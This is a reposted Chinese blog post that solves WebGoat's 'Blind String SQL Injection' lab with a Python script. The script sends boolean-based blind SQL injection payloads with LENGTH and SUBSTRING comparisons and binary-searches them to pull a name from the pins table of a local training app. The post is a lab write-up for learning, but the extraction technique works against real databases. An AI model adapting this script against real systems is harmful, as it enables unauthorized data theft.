您的位置:首页 > 数据库

webgoat 中 Blind String SQL Injection 的 Python 编程解决

2013-03-08 16:54 656 查看
这个 task 如果用手工尝试的话, 还是比较麻烦的. 决定用编程解决.

Python处理任务相关的问题比较方便, 花时间入门了下 python, 然后开始写代码, 很简单的原理.

在这期间发现简单的算法都不熟了, 汗.

以下是代码
#!/usr/bin/python
#author: dengzhaoqun
#date: 2013-03-08
#email: dengzhaoqun@163.com

import urllib
import urllib2
import sys

url= 'http://localhost/WebGoat/attack?Screen=3433&menu=1100'
account = 101
result = '<p>Account number is valid</form></div>'

def isValid(str):
    params = urllib.urlencode({'account_number': str, 'SUBMIT':'Go!'})
    req = urllib2.Request(url, params, {'Cookie':'JSESSIONID=8FFA3190C91029D2BB486DEBE4D037B0'})
    f = urllib2.urlopen(req)
    content = f.read()
    ret = content.find(result)
    if(ret == -1):
        return False
    return True

#get name len
lenMax = 100
lenMin = 1

while(lenMax > lenMin):
    #print lenMax, lenMin
    len = (lenMax + lenMin) / 2
    str = "%d and ((LENGTH(select name from pins where cc_number = '4321432143214321')) <= %d)" %(account, len)
    #print str
    valid = isValid(str)
    if( not valid):
        lenMin = len + 1
    else:
        lenMax = len

print "--- name len: %d ---" %lenMax        

# get name
name = ''
for i in range(1, lenMax + 1):
    charMax = 122  # 'z'
    charMin = 65 # 'A'
    while(charMax > charMin):
        #print chr(charMax), chr(charMin)
        char = (charMax + charMin) / 2
        str = "%d and ((SUBSTRING((select name from pins where cc_number = '4321432143214321'), %d, 1)) <= '%s')" %(account, i, chr(char))
        #print str
        valid = isValid(str)
        if( not valid):
            charMin = char + 1
        else:
            charMax = char
    name += chr(charMax)

print '--- name: %s ---' % name
运行结果如下
--- name len: 4 ---
--- name: Jill ---
"Jill" 即是所求的 name .
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐
新的分享
章节导航